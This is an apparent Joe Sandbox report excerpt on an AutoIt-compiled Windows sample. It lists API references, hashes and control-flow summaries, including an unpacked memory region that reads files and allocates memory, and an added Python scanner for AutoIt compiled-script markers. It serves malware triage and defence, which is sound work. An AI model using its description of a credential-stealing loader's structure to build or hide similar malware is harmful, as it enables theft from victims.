                                                                              • Instruction Fuzzy Hash: 6A21A671D00315A9DB14BBB2A9467EE2664AF1074CF1144AFF9056A2D3EEBCC8C1461D

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __fread_nolock$_fseek_wcscpy
                                                                              • String ID: FILE
                                                                              • API String ID: 3888824918-3121273764
                                                                              • Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                              • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                                                                              • Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                              • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA

                                                                              APIs
                                                                              • GetSysColorBrush.USER32 ref: 00410326
                                                                              • RegisterClassExW.USER32 ref: 00410359
                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                              • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                              • LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                              • ImageList_ReplaceIcon.COMCTL32(00AD1698,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                              • API String ID: 2914291525-1005189915
                                                                              • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                              • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                                                              • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                              • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A

                                                                              APIs
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                              • LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                              • LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                              • LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                              • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                              • RegisterClassExW.USER32 ref: 004102C6
                                                                                • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                                                                • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                                                                • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(00AD1698,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                              • String ID: #$0$PGH
                                                                              • API String ID: 423443420-3673556320
                                                                              • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                              • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                                                              • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                              • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99

                                                                              APIs
                                                                              • _fseek.LIBCMT ref: 004525DA
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                              • __fread_nolock.LIBCMT ref: 00452618
                                                                              • __fread_nolock.LIBCMT ref: 00452629
                                                                              • __fread_nolock.LIBCMT ref: 00452644
                                                                              • __fread_nolock.LIBCMT ref: 00452661
                                                                              • _fseek.LIBCMT ref: 0045267D
                                                                              • _malloc.LIBCMT ref: 00452689
                                                                              • _malloc.LIBCMT ref: 00452696
                                                                              • __fread_nolock.LIBCMT ref: 004526A7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __fread_nolock$_fseek_malloc_wcscpy
                                                                              • String ID:
                                                                              • API String ID: 1911931848-0
                                                                              • Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                              • Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
                                                                              • Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                              • Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A

                                                                               Control-flow Graph
                                                                               (rendered graph not reproduced; recovered from it: entry block 0x40f450, basic blocks 0x40f450-0x40f57a plus out-of-line blocks 0x429361-0x4293c3, calls to 0x425210, 0x413990, 0x410f70, 0x4151b0, 0x41557c, 0x4151d0)
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __fread_nolock_fseek_strcat
                                                                              • String ID: AU3!$EA06
                                                                              • API String ID: 3818483258-2658333250
                                                                              • Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                              • Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
                                                                              • Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                              • Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B
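The function at 0x40f450 above seeks and reads through the file (_fseek, __fread_nolock) and carries the two string fragments "AU3!" and "EA06"; its _strcat call suggests they are joined at runtime into the eight-byte "AU3!EA06" header that marks an AutoIt v3 compiled script, and the GUI-init function at 0x4102F0 registers the "AutoIt v3 GUI" window class. Together these are the usual static tells of an AutoIt-compiled executable. The scanner below is an editor-added triage example, not code from the Joe Sandbox report or from the sample: it looks for the same two markers from the analyst's side, handles markers that straddle a read boundary, and reports absolute offsets. The sample buffer, function names and verdict labels are this example's own.

```python
"""Locate AutoIt v3 compiled-script markers in a file (editor-added triage example)."""
from __future__ import annotations

import io
from typing import BinaryIO, Dict, List

# Fragments listed as strings for the function at 0x40f450; its _strcat call
# suggests they are joined at runtime into the 8-byte compiled-script header.
AU3_TAG = b"AU3!"
AU3_VERSION = b"EA06"
AU3_SIGNATURE = AU3_TAG + AU3_VERSION

# Window class registered with RegisterClassExW in the GUI-init function
# (0x4102F0), hence stored as UTF-16LE in the binary.
AUTOIT_GUI_CLASS = "AutoIt v3 GUI".encode("utf-16-le")

NEEDLES: Dict[str, bytes] = {
    "au3_signature": AU3_SIGNATURE,
    "autoit_gui_class": AUTOIT_GUI_CLASS,
}


def find_all(data: bytes, needle: bytes) -> List[int]:
    """Every offset of `needle` in `data`, ascending (overlapping hits included)."""
    hits: List[int] = []
    start = 0
    while True:
        i = data.find(needle, start)
        if i < 0:
            return hits
        hits.append(i)
        start = i + 1


def scan_bytes(data: bytes) -> Dict[str, List[int]]:
    """One-shot scan of an in-memory buffer."""
    return {key: find_all(data, needle) for key, needle in NEEDLES.items()}


def scan_stream(fh: BinaryIO, chunk_size: int = 64 * 1024) -> Dict[str, List[int]]:
    """Chunked scan that carries an overlap so a marker split across two reads is still found.

    Each hit is reported exactly once at its absolute file offset: a hit that
    ends inside the carried-over tail was already reported in the previous round.
    """
    overlap = max(len(n) for n in NEEDLES.values()) - 1
    hits: Dict[str, List[int]] = {key: [] for key in NEEDLES}
    tail = b""
    base = 0  # absolute file offset of buf[0]
    while True:
        chunk = fh.read(chunk_size)
        if not chunk:
            return hits
        buf = tail + chunk
        for key, needle in NEEDLES.items():
            for off in find_all(buf, needle):
                if off + len(needle) > len(tail):  # touches new bytes -> not a repeat
                    hits[key].append(base + off)
        tail = buf[-overlap:]
        base += len(buf) - len(tail)


def scan_file(path: str) -> Dict[str, List[int]]:
    with open(path, "rb") as fh:
        return scan_stream(fh)


def scan_bytes_streamed(data: bytes, chunk_size: int) -> Dict[str, List[int]]:
    """Run the chunked scanner over a buffer (exercises the boundary handling)."""
    return scan_stream(io.BytesIO(data), chunk_size)


def classify(hits: Dict[str, List[int]]) -> str:
    """Verdict labels are this example's own, not Joe Sandbox signature names."""
    if hits["au3_signature"]:
        return "autoit-compiled-script"
    if hits["autoit_gui_class"]:
        return "autoit-runtime-only"
    return "no-autoit-markers"


# Constructed sample buffer (not bytes from the analysed file): a stub header,
# filler, the script signature at offset 99 and the GUI class name at offset 124.
SAMPLE = (
    b"MZ" + b"\x00" * 62
    + b"garbage" * 5
    + AU3_SIGNATURE
    + b"\x00" * 17
    + AUTOIT_GUI_CLASS
    + b"\xff" * 9
)


if __name__ == "__main__":
    result = scan_bytes(SAMPLE)
    print(result, classify(result))
```

A hit on either marker says only that the file embeds the AutoIt runtime or a compiled script; AutoIt itself is a legitimate tool, so the verdict is a triage lead to pair with the report's behavioural signatures (thread injection, browser and mail credential access) rather than a malicious finding on its own. Running `scan_file` on a dropped or extracted sample gives the offset of the "AU3!EA06" header, which is where the embedded script resource starts for further unpacking.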

                                                                               Control-flow Graph
                                                                               (rendered graph not reproduced; recovered from it: entry block 0x410130, basic blocks 0x410130-0x4101ee plus out-of-line block 0x42944f-0x429459, API calls SHGetMalloc, SHGetDesktopFolder, SHGetPathFromIDListW, calls to 0x411691)
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$DesktopFolderFromListMallocPath
                                                                              • String ID: C:\Users\user\Desktop\r6lOHDg9N9.exe
                                                                              • API String ID: 192938534-2106797220
                                                                              • Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                              • Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
                                                                              • Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                              • Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6

                                                                               Control-flow Graph
                                                                               (rendered graph not reproduced; recovered from it: entry block 0x401230, basic blocks 0x401230-0x4012cd plus out-of-line blocks 0x42aa61-0x42ab15, calls to 0x4131f0, 0x401be0, KillTimer, SetTimer and Shell_NotifyIconW)
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00401257
                                                                                • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
                                                                                • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
                                                                                • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
                                                                                • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                              • KillTimer.USER32(?,?), ref: 004012B0
                                                                              • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                                                                              • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                                                                              • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                                                                              • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                                                              • String ID:
                                                                              • API String ID: 1792922140-0
                                                                              • Opcode ID: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                              • Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
                                                                              • Opcode Fuzzy Hash: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                              • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB

                                                                              Control-flow Graph (legend: Executed / Not Executed; graph image not preserved in this export)
                                                                              • Function at 3ecc228, basic blocks 3ecc228-3ecc52a; blocks call CreateFileW, VirtualAlloc, ReadFile, CloseHandle, VirtualFree and the internal subroutines 3ec9c18, 3ecd138, 3ecd388, 3ecd198
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03ECC2F9
                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03ECC51F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714904224.0000000003EC9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3ec9000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileFreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 204039940-0
                                                                              • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                              • Instruction ID: 0e1292c3d7c17478e1bc2c6c97932bf706577e88fc2df2d6e911f2bb82beb0bc
                                                                              • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                              • Instruction Fuzzy Hash: CDA12874E10248EBDB14CFA4C984BEEB7B5FF48304F24929DE506BB280D7759A82CB55

                                                                              Control-flow Graph (legend: Executed / Not Executed; graph image not preserved in this export)
                                                                              • Function at 414f10, basic blocks 414f10-415118; no direct Win32 API calls, blocks call the internal subroutines 417f23, 417ebb, 4131f0, 41e6b1, 41453a, 41ed9e, 41ee9b
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                              • String ID:
                                                                              • API String ID: 3886058894-0
                                                                              • Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                              • Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
                                                                              • Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                              • Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99

                                                                              Control-flow Graph (legend: Executed / Not Executed; graph image not preserved in this export)
                                                                              • Function at 4103e0, single basic block 4103e0-410461; calls CreateWindowExW twice and ShowWindow twice
                                                                              APIs
                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                              • ShowWindow.USER32(?,00000000), ref: 00410454
                                                                              • ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CreateShow
                                                                              • String ID: AutoIt v3$edit
                                                                              • API String ID: 1584632944-3779509399
                                                                              • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                              • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                                                                              • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                              • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C

                                                                              Control-flow Graph (legend: Executed / Not Executed; graph image not preserved in this export)
                                                                              • Function at 3ecbfc8, basic blocks 3ecbfc8-3ecc1da; blocks call CreateFileW, VirtualAlloc, ReadFile, ExitProcess and the internal subroutines 3ec9c18, 3ecbeb8, 3ecbef8, 3ecaeb8, 3ecbf48
                                                                              APIs
                                                                                • Part of subcall function 03ECBEB8: Sleep.KERNELBASE(000001F4), ref: 03ECBEC9
                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03ECC114
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714904224.0000000003EC9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3ec9000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileSleep
                                                                              • String ID: H3X8AOTQ36PW7ORRR95UM0W29QFQ5
                                                                              • API String ID: 2694422964-252421423
                                                                              • Opcode ID: 7d08205459bea93951d844a3ca2320e211b7b0209a076aa72a83251997a75883
                                                                              • Instruction ID: d0fba81684d900066549f2b57de3c9322ef6c72dc3f77db916008f73ef1cdb8c
                                                                              • Opcode Fuzzy Hash: 7d08205459bea93951d844a3ca2320e211b7b0209a076aa72a83251997a75883
                                                                              • Instruction Fuzzy Hash: A2618430D18288DAEF11DBB4C848BEEBBB8AF15304F04419DE5587B2C1D7B91B49CB65

                                                                              Control-flow Graph (legend: Executed / Not Executed; graph image not preserved in this export)
                                                                              • Function at 413a88, basic blocks 413a88-413b15; blocks call RtlFreeHeap, GetLastError and the internal subroutines 41718c, 4171d1, 418407, 419f6d, 419f9d, 413ade, 417f23, 417ee1
                                                                              APIs
                                                                              • __lock.LIBCMT ref: 00413AA6
                                                                                • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                                                                                • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                                                                                • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                                                                              • ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                              • ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                              • RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                              • GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                              • String ID:
                                                                              • API String ID: 2714421763-0
                                                                              • Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                              • Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
                                                                              • Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                              • Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C
                                                                              APIs
                                                                                • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
                                                                                • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
                                                                                • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
                                                                              • _strcat.LIBCMT ref: 0040F603
                                                                                • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
                                                                                • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
                                                                              • String ID: HH
